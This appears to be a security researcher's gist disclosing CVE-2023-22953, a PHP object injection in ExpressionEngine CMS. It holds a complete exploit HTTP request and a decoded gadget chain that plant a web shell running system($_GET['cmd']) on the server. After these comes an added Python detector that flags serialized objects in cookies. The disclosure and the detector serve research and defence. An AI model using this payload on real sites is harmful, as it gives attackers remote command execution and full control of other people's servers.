@ahmedsherif
Created March 2, 2023 12:58
Publication of CVE-2023-22953: PHP Object Injection with a custom gadget chain

- CVE ID: CVE-2023-22953
- Vulnerable version: 7.2.5
- Vulnerable software: ExpressionEngine CMS
- Link: https://expressionengine.com/
- Authors: Ahmed Sherif (@sherif_ninja) and Abood Nour (@AboodNour)

Description

Arbitrary command execution through a PHP object injection vulnerability. The affected endpoint is /cp/addons/settings/filepicker, which accepts a serialized object in the exp_viewtype cookie; sending a malicious serialized object there triggers the injection. The bundled Flysystem cached-storage Adapter class can be used to build a gadget chain that writes PHP files into the default app directory.

Impact

An authenticated user can exploit the PHP Object Injection and gain command execution on the underlying operating system.

Exploit

GET /admin.php?/cp/addons/settings/filepicker HTTP/1.1
Host: localhost:30001
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Purpose: prefetch
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: exp_last_visit=1671913623; exp_last_activity=1671968630; exp_viewtype=a%3A2%3A%7Bi%3A1337%3BO%3A67%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CCached%5C%5CStorage%5C%5CAdapter%22%3A4%3A%7Bs%3A7%3A%22adapter%22%3BO%3A58%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CAdapter%5C%5CLocal%22%3A4%3A%7Bs%3A10%3A%22rootExists%22%3Bb%3A0%3Bs%3A13%3A%22pathSeparator%22%3Bs%3A1%3A%22%2F%22%3Bs%3A10%3A%22writeFlags%22%3Bi%3A0%3Bs%3A10%3A%22pathPrefix%22%3Bs%3A32%3A%22%2Fvar%2Fwww%2Fhtml%2Fimages%2Ftesting.php%22%3B%7Ds%3A8%3A%22autosave%22%3Bb%3A0%3Bs%3A4%3A%22file%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22expire%22%3Bs%3A34%3A%22%3C%3Fphp+echo+system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%3B%7Di%3A1337%3Bs%3A5%3A%227knbh%22%3B%7D%; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%223f92644cb590bcfc68dab723c0211297faea6108e6c788b23da23ff45100808e41675301e75d960c6ac60df9021f5acc%22%7D; exp_csrf_token=fe3239026bae4959dfe79f2701e87d181d9d4a07; exp_sessionid=2684f59ade507f3ee6f45f6eef4eeff6edd686d8
Connection: close

Gadget chain:

a:2:{i:1337;O:67:"ExpressionEngine\\Dependency\\League\\Flysystem\\Cached\\Storage\\Adapter":4:{s:7:"adapter";O:58:"ExpressionEngine\\Dependency\\League\\Flysystem\\Adapter\\Local":4:{s:10:"rootExists";b:0;s:13:"pathSeparator";s:1:"/";s:10:"writeFlags";i:0;s:10:"pathPrefix";s:29:"/var/www/html/images/file.php";}s:8:"autosave";b:0;s:4:"file";s:0:"";s:6:"expire";s:34:"<?php echo system($_GET['cmd']);?>";}i:1337;s:5:"7knbh";}
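A defensive check for the cookie-borne serialized objects described in the Description and shown in the gadget chain above, added here as an example that is not part of the gist: it splits a raw Cookie header, URL-decodes each value and reports any cookie that carries a serialized PHP object together with the class names involved, accepting a token only when its declared class-name length matches, the same validation unserialize() applies. The cookie values and class names below are constructed for the example.

```python
import re
from urllib.parse import quote, unquote_plus

# A serialized PHP object starts with  O:<name_length>:"<class_name>":
# Capturing both parts lets us verify the length the way unserialize() does.
OBJECT_RE = re.compile(r'O:(\d+):"([^"]*)":')


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie header into {name: raw_value}; values stay URL-encoded."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def serialized_classes(value: str) -> list:
    """Class names of PHP objects serialized inside one (URL-encoded) cookie value.

    '+' is decoded as a space because cookie payloads are often form-encoded.
    A token only counts when its declared byte length matches the class name,
    which filters out text that merely happens to contain O:<n>:"...".
    """
    decoded = unquote_plus(value)
    return [cls for length, cls in OBJECT_RE.findall(decoded)
            if int(length) == len(cls.encode())]


def flag_request(cookie_header: str) -> dict:
    """Map each cookie name that carries a serialized object to its class names.

    An empty dict means the request has nothing worth alerting on.
    """
    findings = {}
    for name, raw in parse_cookie_header(cookie_header).items():
        classes = serialized_classes(raw)
        if classes:
            findings[name] = classes
    return findings


# Constructed sample Cookie headers (not taken from the advisory).
BENIGN = "exp_last_visit=1671913623; exp_sessionid=0123abcd"
# Nested objects of hypothetical classes, URL-encoded as a browser would send
# them, plus a decoy whose declared length is wrong and must not be reported.
SUSPECT = "exp_last_visit=1671913623; exp_viewtype=" + quote(
    'a:2:{i:0;O:17:"Vendor\\Lib\\Gadget":1:{s:5:"inner";'
    'O:12:"Vendor\\Inner":0:{}}i:1;s:20:"O:5:"NotAClassName":";}'
)
```

Run flag_request over the Cookie header of each request to the filepicker endpoint; any non-empty result for exp_viewtype is a strong signal, since that cookie should never carry an object.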